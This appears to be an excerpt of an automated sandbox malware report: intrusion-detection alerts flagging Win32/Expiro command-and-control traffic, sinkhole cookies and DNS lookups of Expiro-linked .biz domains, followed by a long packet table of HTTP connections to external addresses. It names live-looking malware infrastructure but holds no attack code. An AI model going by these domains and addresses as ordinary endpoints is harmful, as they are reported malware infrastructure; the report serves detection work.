                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:43.727257+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.549919TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:45.659876+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.549930TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:45.659876+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.549930TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:51.190177+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.549966TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:51.190177+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.549966TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:52.166217+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.549975TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:52.166217+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.549975TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:58.470918+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.550002TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:58.470918+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.550002TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:59.362254+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.550003TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:50:59.362254+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.550003TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:04.096495+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.550006TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:04.096495+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.550006TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:12.183078+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.55001218.246.231.12080TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:12.188937+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.550012TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:12.188937+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.550012TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:26.049079+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.550023TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:26.049079+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.550023TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:51:41.621440+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.5538261.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:01.565340+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.5530341.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:07.869496+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.5551311.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:12.523104+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.55006818.208.156.24880TCP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:15.882417+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.5582351.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:38.611879+01002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.5607101.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:54.306362+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5530171.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:55.922346+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5618251.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                  2024-10-28T16:52:55.944670+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5618251.1.1.153UDP

                                                                                                                                                                                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.900762081 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.906209946 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.906281948 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.906426907 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.906460047 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.912231922 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.912246943 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.867952108 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.871433020 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.871670961 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.888617039 CET4970480192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.894376040 CET804970454.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.994373083 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.999912024 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.000077009 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.000165939 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.000225067 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.005958080 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.006056070 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.021017075 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.026557922 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.026637077 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.026778936 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.026796103 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.032521009 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.032552958 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.842086077 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.842322111 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.848951101 CET804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.849133015 CET4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.933182955 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.938891888 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.939004898 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.939378023 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.939480066 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.945270061 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.945831060 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.442179918 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.442394018 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.448398113 CET804970618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.448492050 CET4970680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.643116951 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.648516893 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.648710012 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.648710012 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.648732901 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.654169083 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.654182911 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.377466917 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.380902052 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.388479948 CET804970718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.388654947 CET4970780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.469491005 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.472599983 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.478205919 CET804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.478260994 CET4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.692472935 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.697990894 CET804970944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.698312998 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.698465109 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.698534966 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.705987930 CET804970944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.706002951 CET804970944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.732785940 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.740106106 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.740196943 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.740437031 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.740464926 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.747560024 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.747575998 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.372359991 CET804970944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.407058954 CET804970944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.407124043 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.586586952 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.586729050 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.592648983 CET804971054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.592709064 CET4971080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.712305069 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.919926882 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.920023918 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.920277119 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.920291901 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.925868988 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.925899982 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.587095022 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.587332010 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.593285084 CET804971144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.593383074 CET4971180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.651236057 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.656694889 CET8049713172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.656956911 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.656956911 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.656980991 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.662329912 CET8049713172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.662341118 CET8049713172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.319967031 CET8049713172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.320099115 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.348968029 CET4971380192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.354357958 CET8049713172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.410794020 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.416110992 CET8049719172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.416186094 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.416445971 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.416553020 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.421839952 CET8049719172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:05.421881914 CET8049719172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.110512972 CET8049719172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.110600948 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.110693932 CET4971980192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.116477966 CET8049719172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.189582109 CET4972080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.195058107 CET804972018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.195144892 CET4972080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.195262909 CET4972080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.195286036 CET4972080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.200642109 CET804972018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.201052904 CET804972018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.635282040 CET804972018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.635601044 CET4972080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.641532898 CET804972018.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.641638041 CET4972080192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.815546036 CET4973080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.821094036 CET804973082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.821176052 CET4973080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.821641922 CET4973080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.821676970 CET4973080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.827199936 CET804973082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.827213049 CET804973082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.300143957 CET804973082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.300225019 CET4973080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.300282001 CET4973080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.305748940 CET804973082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.347595930 CET4978080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.353202105 CET804978082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.353271008 CET4978080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.353391886 CET4978080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.353420019 CET4978080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.358925104 CET804978082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:16.358935118 CET804978082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.834953070 CET804978082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.835617065 CET4978080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.835726023 CET4978080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.841334105 CET804978082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.914189100 CET4983080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.919743061 CET804983082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.919847012 CET4983080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.924645901 CET4983080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.924668074 CET4983080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.930082083 CET804983082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.930192947 CET804983082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:30.886439085 CET4970980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.394474030 CET804983082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.394535065 CET4983080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.394581079 CET4983080192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.400069952 CET804983082.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.459481955 CET4987380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.465018988 CET804987382.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.465109110 CET4987380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.465249062 CET4987380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.465286970 CET4987380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.471529007 CET804987382.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:33.471723080 CET804987382.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:41.952182055 CET804987382.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:41.952260971 CET4987380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:41.952372074 CET4987380192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:41.957757950 CET804987382.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:42.132981062 CET4991980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:42.274378061 CET804991947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:42.274468899 CET4991980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:42.274624109 CET4991980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:42.274646044 CET4991980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:42.280158043 CET804991947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:42.280167103 CET804991947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:43.717546940 CET804991947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:43.718588114 CET4991980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:43.727257013 CET804991947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:43.728524923 CET4991980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:44.133097887 CET4993080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:44.138514996 CET804993013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:44.138597012 CET4993080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:44.138880014 CET4993080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:44.138880014 CET4993080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:44.144412041 CET804993013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:44.144434929 CET804993013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.564770937 CET804993013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.615720987 CET4993080192.168.2.513.251.16.150
